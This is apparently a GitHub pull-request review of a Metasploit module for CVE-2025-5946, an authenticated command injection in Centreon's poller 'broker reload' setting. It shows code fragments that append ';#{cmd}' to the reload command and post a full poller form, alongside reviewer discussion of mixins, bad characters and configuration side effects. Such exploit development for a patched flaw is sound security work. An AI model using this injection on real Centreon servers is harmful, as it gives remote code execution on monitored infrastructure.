Centreon authenticated command injection leading to RCE via broker engine "reload" parameter [CVE-2025-5946] #20672
Conversation
|
|
||
| # login at the Centreon web application | ||
| # return true if login successful else false | ||
| def centreon_login(name, pwd) |
There was a problem hiding this comment.
It'd be lovely this have this into a mixing, as there are already 3 modules targeting centreon.
There was a problem hiding this comment.
I'd agree here, i think we have a non-written rule that if 3 modules are doing something similar it should be a mixin.
|
|
||
| # get the Centreon version | ||
| # return version if successful else nil | ||
| def get_centreon_version |
There was a problem hiding this comment.
This would also be great to have in a mixin <3
There was a problem hiding this comment.
Hello @h00die-gr3y,
Thanks for your module, I've left a review and I will setup the target to test the exploit.
|
|
||
| # login at the Centreon web application | ||
| # return true if login successful else false | ||
| def centreon_login(name, pwd) |
There was a problem hiding this comment.
I'd agree here, i think we have a non-written rule that if 3 modules are doing something similar it should be a mixin.
| # CVE-2025-5946: Command Injection leading to RCE via the centreon broker engine "reload" parameter triggered by a poller reload | ||
| def execute_payload(cmd, _opts = {}) | ||
| @clean_payload = true | ||
| payload = ";#{cmd}" |
There was a problem hiding this comment.
Would be ; considered a badchar also?
There was a problem hiding this comment.
No, I would not consider this as a badchar, because it will not have any effect on the execution of the payload generated.
| 'name' => 'Central', | ||
| 'ns_ip_address' => '127.0.0.1', | ||
| 'localhost[localhost]' => 1, | ||
| 'is_default[is_default]' => 1, | ||
| 'gorgone_communication_type[gorgone_communication_type]' => 1, | ||
| 'gorgone_port' => 5556, | ||
| 'engine_start_command' => 'service centengine start', | ||
| 'engine_stop_command' => 'service centengine stop', | ||
| 'engine_restart_command' => 'service centengine restart', | ||
| 'engine_reload_command' => 'service centengine reload', | ||
| 'nagios_bin' => '/usr/sbin/centengine', | ||
| 'nagiostats_bin' => '/usr/sbin/centenginestats', | ||
| 'nagios_perfdata' => '/var/log/centreon-engine/service-perfdata', | ||
| 'broker_reload_command' => "service cbd reload#{payload}", | ||
| 'centreonbroker_cfg_path' => '/etc/centreon-broker', | ||
| 'centreonbroker_module_path' => '/usr/share/centreon/lib/centreon-broker', | ||
| 'centreonbroker_logs_path' => nil, | ||
| 'centreonconnector_path' => '/usr/lib64/centreon-connector', | ||
| 'init_script_centreontrapd' => 'centreontrapd', | ||
| 'snmp_trapd_path_conf' => '/etc/snmp/centreon_traps/', | ||
| 'ns_activate[ns_activate]' => 1, | ||
| 'submitC' => 'Save', | ||
| 'id' => 1, | ||
| 'o' => 'c', | ||
| 'centreon_token' => centreon_token.to_s |
There was a problem hiding this comment.
are these information static? meaning let's assume I use the application and I may have a different gorgone_port, this payload will overwrite everything with this data right? can this be avoided? or we should maybe add it to the side effects
There was a problem hiding this comment.
You are right, but it is a bit of a hassle to pull all these values from the HTML response. It is not nice JSON or XML format. I rather leave like it is, because the majority of the installations are using these defaults.
There was a problem hiding this comment.
Ok sounds reasonable, would you mind adding CONFIG_CHANGE as a SideEffects to play it safe?
4 participants
Centreon is a platform designed to monitor your cloud and on-premises infrastructure.
This module exploits an command injection vulnerability using the
broker engine reloadsetting on the poller configuration page of the Centreon web application. Injecting a malcious payload at thebroker engine reloadparameter and restarting the poller triggers this vulnerability.You need have admin access at the Centreon Web application in order to execute this RCE.
This issue affects all Centreon editions >=
19.10.0and it is fixed in Centreon Web versions24.10.13,24.04.18and23.10.28.